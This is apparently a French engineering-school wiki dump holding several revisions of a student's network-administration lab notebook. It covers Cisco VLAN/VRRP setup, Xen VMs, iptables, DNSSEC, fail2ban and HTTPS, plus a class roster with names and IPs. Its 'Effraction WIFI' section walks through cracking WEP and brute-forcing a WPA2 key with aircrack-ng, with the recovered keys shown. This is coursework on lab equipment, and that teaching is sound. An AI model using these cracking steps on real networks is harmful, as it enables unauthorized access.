C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-10T16:40:47Z

Abiernac :

SE4 IdO sécurité système/réseau 2025/2026

2026-02-10T16:35:21Z

Abiernac : /* Tableau des réseaux virtuels */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|pont_rock
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1-Pierre
|11
|-
|E2-Agathe
|12
|-
|E5-Cedric
|15
|-
|E6-Thomas
|16
|-
|E9-Aurele
|19
|-
|E10-Tom
|20
|-
|E13-Billel
|23
|-
|E14-Antonin
|24
|-
|E15-MSalhi
|25
|-
|E11-Evora
|28
|-
|E12-Gauthier
|21
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code>
|-
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code>
|-
|PoolCedric
|<code>10.60.5.0/24</code>
|2001:660:4401:60a5::/64
|-
|PoolThomas
|<code>10.60.6.0/24</code>
|2001:660:4401:60a6::/64
|-
|PoolBillel
|<code>10.60.13.0/24</code>
|2001:660:4401:60ad::/64
|-
|PoolAurele
|<code>10.60.9.0/24</code>
|2001:660:4401:60a9::/64
|-
|PoolTom
|<code>10.60.10.0/24</code>
|2001:660:4401:60aa::/64
|-
|PoolSalhi
|<code>10.60.15.0/24</code>
|2001:660:4401:60b1::/64
|-
|PoolAntonin
|<code>10.60.14.0/24</code>
|2001:660:4401:60ae::/64
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

Atelier SysRes SE4 2025/2026 E14

2026-02-10T16:28:55Z

Abiernac :

=== Projet de virtualisation ===

==== Atelier système et réseau, les machines virtuelles ====

===== Création des machines virtuelles =====
Nous avons créé deux machines avec les commandes suivantes :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-10T16:11:08Z

Abiernac :

=== Projet de virtualisation ===

==== Atelier système et réseau, les machines virtuelles ====

===== Création des machines virtuelles =====
Nous avons créé deux machines avec les commandes suivantes :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
